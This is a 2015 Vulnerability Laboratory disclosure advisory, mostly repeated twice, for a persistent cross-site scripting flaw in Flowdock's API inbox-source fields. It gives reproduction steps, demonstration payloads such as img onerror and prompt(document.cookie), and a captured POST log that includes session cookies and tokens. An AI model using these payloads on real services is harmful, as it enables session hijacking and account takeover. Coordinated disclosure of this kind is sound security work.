Vulnerability Laboratory ID (VL-ID):
====================================
1560
Common Vulnerability Scoring System:
====================================
3.8
Product & Service Introduction:
===============================
Chat & inbox for teams.. One place to talk and stay up-to-date. Flowdock is a team collaboration app for desktop, mobile & web.
Work on things that matter, be transparent and solve problems across tools, teams & time zones. Try it for free for 30 days. Keeping Flowdock`s
environment and customer data safe and secure is a top priority for us. Find more details on our Help pages. Don`t hesitate to contact us
at support (at) flowdock (dot) com [email concealed] should you have any questions about Flowdock`s security.
(Copy of the Vendor Homepage: https://www.flowdock.com/security )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation web vulnerability in the official Flowdock online service web-application.
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the officialFlowdock online-service web-application.
The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable context function or service module.
The vulnerability is located in the name input field of the inbox souds flowdock api service. Remote attackers with low privilege application user accounts
are able to inject own malicious script codes to the application-side of the service. The request method to inject malicious context is POST and the attack
vector is located on the application-side of the flowdock api web-service. Remote attackers are able to inject malicious script codes to the application-side
to compromise flowdock accounts by session manipulation or session evasion attacks.
The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8.
Exploitation of the persistent input validation web vulnerability requires a low privilege web-application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to external sources
and persistent manipulation of affected or connected service module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Inbox Source - Flowdock API
Vulnerable Parameter(s):
[+] description
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low privilege application user account and low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Create acount with name have a payload code
2. Click to add more sources..
3. Click add new (Git)
4. Will open new link https://www.flowdock.com/jari/auth/git?flow=e60291f4-8869-4f08-b04d-bc07
ea6eb787&intent=setup write anything in the name and save
5. Now, the payloadcode will execute
6. Successful reproduce of the application-side vulnerability!
PoC: Vulnerable Source
<li class="row source-group active external_application open"><h5 class="group-title">
<a class="expand-link">
<i class="fa fa-caret-right arrow closed-only"></i>
<i class="fa fa-caret-down arrow open-only"></i>
"><img src="x" onerror=alert(1)>
<span class="count light">(following 1 source)</span>
</a>
</h5>
<ul class="source-list"><li class="source"><ul class="clean actions">
<li>
</li>
<li>
<a class="delete" title="Remove this source.">
<i class="fa fa-fw fa-times"></i>
</a>
</li>
</ul>
<h5 class="source-title" title=""></h5>
<span class="name">
javascript:alert(1)
<span class="description">
(Added by "><img src="./ img src= c onerror=prompt(document.cookie) iframe src= c ( img src= c onerror=alert(1) ) - Flowdock_files/c" onerror="prompt(document.cookie)"><iframe src="./ img src= c onerror=prompt(document.cookie) iframe src= c ( img src= c onerror=alert(1) ) - Flowdock_files/c"> on Aug 07)
</span>
</span>
</iframe></span></span></li></ul>
</li>
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerbale input field in the source html file.
Restrict the input and disallow special chars, Escape and include an own exception handling to prevent further execution of script code in the same service section.
Prevent the part of vulnerable code to execute in the output section to finally patch the bug.
Security Risk:
==============
The security risk of the application-side vulnerability in the flowdock online service web-application is estimated as medium. (CVSS 3.8)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.
===============
Flowdock API Bug Bounty #1 - (Description) Persistent Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1560
Release Date:
=============
2015-09-22
Vulnerability Laboratory ID (VL-ID):
====================================
1560
Common Vulnerability Scoring System:
====================================
3.8
Product & Service Introduction:
===============================
Chat & inbox for teams.. One place to talk and stay up-to-date. Flowdock is a team collaboration app for desktop, mobile & web.
Work on things that matter, be transparent and solve problems across tools, teams & time zones. Try it for free for 30 days. Keeping Flowdock`s
environment and customer data safe and secure is a top priority for us. Find more details on our Help pages. Don`t hesitate to contact us
at support (at) flowdock (dot) com [email concealed] should you have any questions about Flowdock`s security.
(Copy of the Vendor Homepage: https://www.flowdock.com/security )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation web vulnerability in the official Flowdock online service web-application.
Vulnerability Disclosure Timeline:
==================================
2015-08-06: Researcher Notification & Coordination (Hadji Samir)
2015-08-07: Vendor Notification (Flowdock Security Team - Bug Bounty Program)
2015-08-08: Vendor Response/Feedback (Flowdock Security Team - Bug Bounty Program)
2015-08-10: Vendor Fix/Patch (Flowdock Developer Team)
2015-09-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Rally Software
Product: Flowdock - Online Service (Web-Application) [API] 2015 Q3
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the officialFlowdock online-service web-application.
The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable context function or service module.
The vulnerability is located in the name input field of the inbox souds flowdock api service. Remote attackers with low privilege application user accounts
are able to inject own malicious script codes to the application-side of the service. The request method to inject malicious context is POST and the attack
vector is located on the application-side of the flowdock api web-service. Remote attackers are able to inject malicious script codes to the application-side
to compromise flowdock accounts by session manipulation or session evasion attacks.
The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8.
Exploitation of the persistent input validation web vulnerability requires a low privilege web-application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to external sources
and persistent manipulation of affected or connected service module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Inbox Source - Flowdock API
Vulnerable Parameter(s):
[+] description
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low privilege application user account and low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Create acount with name have a payload code
2. Click to add more sources..
3. Click add new (Git)
4. Will open new link https://www.flowdock.com/jari/auth/git?flow=e60291f4-8869-4f08-b04d-bc07
ea6eb787&intent=setup write anything in the name and save
5. Now, the payloadcode will execute
6. Successful reproduce of the application-side vulnerability!
PoC: Vulnerable Source
<li class="row source-group active external_application open"><h5 class="group-title">
<a class="expand-link">
<i class="fa fa-caret-right arrow closed-only"></i>
<i class="fa fa-caret-down arrow open-only"></i>
"><img src="x" onerror=alert(1)>
<span class="count light">(following 1 source)</span>
</a>
</h5>
<ul class="source-list"><li class="source"><ul class="clean actions">
<li>
</li>
<li>
<a class="delete" title="Remove this source.">
<i class="fa fa-fw fa-times"></i>
</a>
</li>
</ul>
<h5 class="source-title" title=""></h5>
<span class="name">
javascript:alert(1)
<span class="description">
(Added by "><img src="./ img src= c onerror=prompt(document.cookie) iframe src= c ( img src= c onerror=alert(1) ) - Flowdock_files/c" onerror="prompt(document.cookie)"><iframe src="./ img src= c onerror=prompt(document.cookie) iframe src= c ( img src= c onerror=alert(1) ) - Flowdock_files/c"> on Aug 07)
</span>
</span>
</iframe></span></span></li></ul>
</li>
--- PoC Session Logs [POST] ---
13:21:13.734[746ms][total 2805ms]
Status: 200[OK]
POST https://www.flowdock.com/jari/git/pairings
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[1235] Mime Type[text/html]
Request Headers:
Host[www.flowdock.com]
User-Agent[Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
Referer[https://www.flowdock.com/jari/auth/git?flow=08bbf4d6-90bb-4e5d-9
639-a8cdd218f44b&intent=setup]
Cookie[__cfduid=d3ee44a1993dff388a7905fe132c30ef11435013606; _ga=GA1.2.1847177044.1435013486; ga_cid=1847177044.1435013486; __ar_v4=%7CNVE6VSAVAFEITPQZLCROVA%3A20150622%3A1%7CN4SGXQCDSJGPZCWP5DGWW
O%3A20150622%3A1%7CP3GQR6LVEJFUDLS6YOOZNQ%3A20150622%3A1; _flowdock_credentials=IjdZZW1vZHNxV0pVa3dteTF6ekc4bVhsUU8tUWdBcVo1UDJXY0
RlTUVUUk0i--34afe04c5fa0be13d44c1b9957f2855eed58afc1; logged_in=1438944441; login=1; referrer=Imh0dHBzOi8vd3d3LmZsb3dkb2NrLmNvbS9hcHAvdnVsbi9pbWctc3JjLWMtb25
lcnJvci1wcm9tcHQtZG9jdW1lbnQtY29va2llLWlmcmFtZS1zcmMtYy9zZXR0aW5ncy9wZW9
wbGUi--0c1ce3ad9566d6eba667837e40bfc5cdfc312e1a; _flowdock_session=aXdkYzRVZzkzNTFWSUtmK2NCUkZ5UHhMMzhNdXA4NWcxUkc2dGl3Y1
dtYXk2V1BSRXdDUVBRdmREYzA4bEJNM2xqYkREdlVNd25Iam1QKzdxMUNHNS9tSk5UclRSZC
95QldCYXVLbEtnajNMSng1S0xoOXJXTUNqOHdMQUtzNkVYK2RISndKSklGUWwxMDlSQmRuWm
NnejkxeEdZTkI5Uk1RSDhJVUpNYW1sN1krVzlOQ3pLVGNGUmJzNTV2STBBKzh0Qkg1U05YZF
BWQW1yVXdCcXEzVzFvbnR0djJBc2xXTHpkeUxJY2dZckdiQnNCTDlaNnlOL0hMUDUrdENYWC
0tSC9QQXpmUFZ6b09TR3R5Zm9SL0E1UT09--09202d60842dba5756399463b947f6d99011
8337; _jari_session=ZTRYV1hXQTNMbDZ6cnRlakhDVlZiTjl0S0xybVJKM1pzMmU4Q2JMenAxNX
R3Q1VJMFpJbVc2c29SVldEOU1EU1gwSlVKUEQ4SUZOK0NoTkNhTXdJUlBJeDhpQTNyVVpycW
Znam1UOEU2UHFPYmM4T3lwNjBKTGtNRkpETTFmaDgyVUJEVWtLTkQ3UDNGWTUrcW1DT2NDRW
V3UDZVNFZJblJEdGxLMXNSQlFNNjNoTGxLTWtwYlU3SUIyRzQrWEgwT2Y4cWJWWGw0UlZNMV
pxY2pWZTNFZTAwbjRlNUczK3JDOGpXTllEOVkyZmJRVEgzS1ZKdTRYKy90T1V2Z1o5dGw0UX
I4T2l1N0xKTkhZeTZGOVpvK2t6dXg1TjhQcFlVY2JUQVJudGFKU3JkTmxDYUMzMnhqdGdGOU
s3SmV1amVHSmVLb0NTY3JMS0xENnhIM0N1dFhyV0Rsa2wwc3pFUmwyajRyN3RHbkptaUVxUV
RGWVJzVEp5MnRsSnFSSUg4SU1la1QxaGwyVjc2Ty9nVFRuV2t3TjlXeWlZZnFjYmkxZkNqL2
5SbFRxOWpqR2hpY0tBQVJHMm9Mc3NrKzdQSVRxWkxjTTMxTUpNVkZWbEVrMSt3MXNkNXEzVD
lmQVZJdUhYdEh5Q3FmYVU9LS00dkVENEMyVjRHUURaREZMRmU4NHNRPT0%3D--37555db7d8
a70a51cb36cdad27d89a59a2a58fde]
Connection[keep-alive]
Post Data:
authenticity_token[VcC1q7HxUipoZa37aKDAcxx65KfvByfRDrtyDm5r3ApWKepzR373V
B7C0DQ%2BBHlAegzufv52ocZ3%2Bg4UXKwYyg%3D%3D]
flow[08bbf4d6-90bb-4e5d-9639-a8cdd218f44b]
flow_name[%3Cimg+src%3Dc+onerror%3Dalert%281%29%3E]
flow_token[e085423a527c1f09bcd2f3c26a9b15a5]
source%5Bname%5D[%22%3E%3Ciframe+src%3D%22x%22+onload%3Dalert%28%27xss_b
y_samir_vuln-lab%27%29%3E]
Response Headers:
Date[Fri, 07 Aug 2015 12:24:35 GMT]
Status[200 OK]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
X-Content-Type-Options[nosniff]
Content-Security-Policy[default-src *;script-src 'self';style-src 'self' 'unsafe-inline' 'unsafe-eval';object-src 'self';frame-src 'self' flowdock:;child-src 'self' flowdock:;referrer origin]
Content-Type[text/html; charset=utf-8]
Etag[W/"7562a87d6172a931cb31346f8bf6258b"]
Cache-Control[max-age=0, private, must-revalidate]
X-Request-Id[d52e57ab-6c07-45c5-a548-cf98c7c7ee0d]
X-Runtime[0.160761]
Set-Cookie[_jari_session=d1RLU3JHbFZwQWpUOGFab3pYbFZqNDkyYk9SdXRmS0kweU5
zTmk2ZjBYT0ZTZThLMThLdkxaY3k5UFBjRnRpQUMvVmx5S1B0WXAwYndVQTlkWWMzWGNUU1l
zWExEbnRPZGJIUWpYdjdQTUxNbExJT3dHanB3eWdMVEdvTitCNE9CUk9ERnlEWDJkbDIrVm5
XNFd3cUx1M2VkMnFWa0hjNDZzMEgyQys2NVhHeWZTdVNWR1hUSVlIWTJjVjg4NkpINnRQK2l
5bFg1b1I0Y0h1RVhiSDBPUWhFVzFYM1hFYitpWk5tN0JTN3M1dFZkMWFBRm4zN3BnQlp6dzN
qajZ5MkxBWUt3bW5QcEtzVkpCYS9lMUVoYTNiNjV4YmRFYkVPYjZCWGg5MWZSYkpjbmI2a1g
ybmVkc21ZYksraXRTejFhVkhNNjdZWXNua25idVdWMjQ2UXVjQkc0d1d5TXowMjF5NnY0U0J
HRVVrVVdNWXNLdHB3Q1FsNVdOYkowR08yb0FFcElnd2JxVzd5R2kwNmxlYVhIdW9ibEZXanR
KbWJhV2NEckpmVlF4VXBpcEthQWMvT0M2U0xXZHZpWEhIU3FkOHl6dEVycDdIM3MyOW04OUR
aaXVZYnJuMkVod0l5cC9LbW1HQ3FGdDQ9LS10NHJZUnZBako1aTR6MUUzazBPM1BBPT0%3D-
-7693378af4e0387d949146f52269990db013bf21; path=/; HttpOnly]
X-Server-Id[475b6e71889f174f61273dab9d11d64422779f4c]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[1235]
Reference(s):
https://www.flowdock.com/
https://www.flowdock.com/jari/
https://www.flowdock.com/jari/git/
https://www.flowdock.com/jari/git/pairings
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerbale input field in the source html file.
Restrict the input and disallow special chars, Escape and include an own exception handling to prevent further execution of script code in the same service section.
Prevent the part of vulnerable code to execute in the output section to finally patch the bug.
Security Risk:
==============
The security risk of the application-side vulnerability in the flowdock online service web-application is estimated as medium. (CVSS 3.8)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [samir (at) evolution-sec (dot) com [email concealed]]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.
Copyright © 2015 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]
PGP KEY: http://www.vulnerability-lab.com/keys/admin (at) vulnerability-lab (dot) com [email concealed]%280x19
8E9928%29.txt
[ reply ]